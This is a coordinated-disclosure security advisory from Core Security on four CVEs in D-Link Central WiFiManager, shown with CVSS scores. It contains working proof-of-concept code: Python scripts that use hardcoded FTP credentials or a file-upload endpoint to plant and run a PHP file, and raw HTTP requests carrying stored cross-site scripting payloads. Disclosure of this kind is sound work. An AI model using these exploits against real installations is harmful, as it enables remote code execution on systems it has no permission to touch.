7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.009 Low
EPSS
Percentile
82.4%
**Title:**D-Link Central WiFiManager Software Controller Multiple Vulnerabilities
**Advisory ID:**CORE-2018-0010
**Advisory URL:**http://www.coresecurity.com/core-labs/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
**Date published:**2018-10-04
**Date of last update:**2018-10-04
**Vendors contacted:**D-Link
**Release mode:**Coordinated release
**Class:**Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Authorization [CWE-285], Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) [CWE-79], Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) [CWE-79]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**Yes
CVE Name:CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
D-Link’s website states that:
[1] Central WiFiManager Software Controller helps network administrators streamline their wireless access point (AP) management workflow. Central WiFiManager is an innovative approach to the more traditional hardware-based multiple access point management system. It uses a centralized server to both remotely manage and monitor wireless APs on a network.
Vulnerabilities were found in the Central WiFiManager Software Controller, allowing unauthenticated and authenticated file upload with dangerous type that could lead to remote code execution with system permissions. Also, two stored Cross Site Scripting vulnerabilities were found.
Other products and versions might be affected, but they were not tested.
D-Link released the following Beta version that addresses the reported vulnerabilities:
In addition, D-Link published a security note in: <https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092>
These vulnerabilities were discovered and researched by Julian Muñoz from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
D-Link Central WiFiManager Software Controller exposes an FTP server that serves by default in port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this fact, we will upload a PHP file in the ‘/web/public’ directory and then, by requesting this file, will be able to execute arbitrary code on the target system (shown in 7.1).
On 7.2 we show a similar attack to but in this case with an authenticated user in the web application. The application has a functionality to upload a .rar file used for the captive portal displayed by the Access Points. We will craft a .rar with a PHP file that we will end up executing in the context of the web application. When the .rar is uploaded is stored in the path “\web\captivalportal” in a folder with a timestamp created by the PHP time() function. In order to know what is the web server’s time we request an information file that contains the time we are looking for. After we have the server’s time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one.
Finally, we discovered two Cross-Site Scripting, one on the update site functionality, in the ‘sitename’ parameter (7.3) and the other one on the creation of a local user in the ‘username’ parameter (7.4).
[CVE-2018-17440] The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution.
import requests from ftplib import FTP #stablish connection with FTP server host_ip =
"127.0.0.1" ftp = FTP() ftp.connect(host=host_ip, port=9000) ftp.login("admin", "admin")
data = [] #create PHP poc file poc_php_file = open("poc.php", "w+") poc_php_file.write
("<?php\nsystem('whoami');\n?>") poc_php_file.close() #upload PHP poc file php_file =
open("poc.php", "rb") ftp.cwd('/web/public') ftp.storbinary("STOR write_file.php", php_file)
ftp.dir(data.append) ftp.quit() for line in data: print "-", line session = requests.
Session() session.trust_env = False #get the uploaded file for remote code execution
get_uploaded_file = session.get('https: //127.0.0.1/public/write_file.php', verify=False)
print get_uploaded_file.text
[CVE-2018-17442] In this case we make a file upload using the functionality given by the onUploadLogPic endpoint, that will take a .rar file, decompress it and store it in a folder named after the PHP time() function. Our goal is first obtain the server’s time, upload a .rar with our PHP file, calculate the proper epoch and iterate increasing it until we hit the proper one and remote code execution is achieved.
import re import time import requests import datetime import tarfile def parse_to_datetime
(date_string): date_list = date_string.split("-") td = date_list[2][2:].split(":") return
datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]),
int(td[1]), int(td[2])) session = requests.Session() session.trust_env = False php_session_id
= "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) cookie =
{'PHPSESSID': php_session_id} #create tar file to upload. poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() poc_tar_file = tarfile.open
("poc_tar_file.tar", mode="w") poc_tar_file.add("poc.php") poc_tar_file.close() #get server
datetime. get_server_time_from_requested_file = session.get('https: //127.0.0.1/index.php/
ReportSecurity/ExportAP/type/TXT', cookies=cookie, verify=False) date = re.search("Date(.*)\d",
get_server_time_from_requested_file.text).group().replace('DateTime ', '') #generate epoch from
server's date epoch = int(time.mktime(parse_to_datetime(date).timetuple())) #upload attack PHP file.
attack_tar_file = "poc_tar_file.tar" tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_
file, 'rb')} restore_backup_response = session.post('https: //127.0.0.1/index.php/Config/onUploadLogPic',
files=tar_file, cookies=cookie, verify=False) for i in range(0,20): #get the uploaded file named
after time epoch, returned by PHP time() function. filename = str(epoch) + "/" + "poc.php" get_
uploaded_file = session.get('https: //127.0.0.1/captivalportal/%s' %filename, verify=False) if
get_uploaded_file.status_code == 200: print "Remote Code Execution Achived" print get_uploaded_
file.text break epoch += 1
[CVE-2018-17443] The ‘sitename’ parameter of the UpdateSite endpoint is vulnerable to a stored Cross Site Scripting:
The following is a proof of concept to demonstrate the vulnerability:
POST /index.php/Config/UpdateSite HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0
(X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application
/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding:
gzip, deflate Referer: https: //10.2.45.220/index.php/Config/CreatSite Cookie:
Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded
Content-Length: 66 siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
[CVE-2018-17441] The ‘username’ parameter of the addUser endpoint is vulnerable to a stored Cross Site Scripting.
The following is a proof of concept to demonstrate the vulnerability:
POST /index.php/System/addUser HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0
(X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:// 10.2.45.220/index.php/
System/userManager Content-Type: application/x-www-form-urlencoded; Content-Length: 96
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvb
nmn343424rg8m1jg3qbc05 Connection: close username=<script>alert(1)</script>&userpassword
=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs.
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company’s threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia.
The contents of this advisory are copyright © 2018 Core Security and © 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.009 Low
EPSS
Percentile
82.4%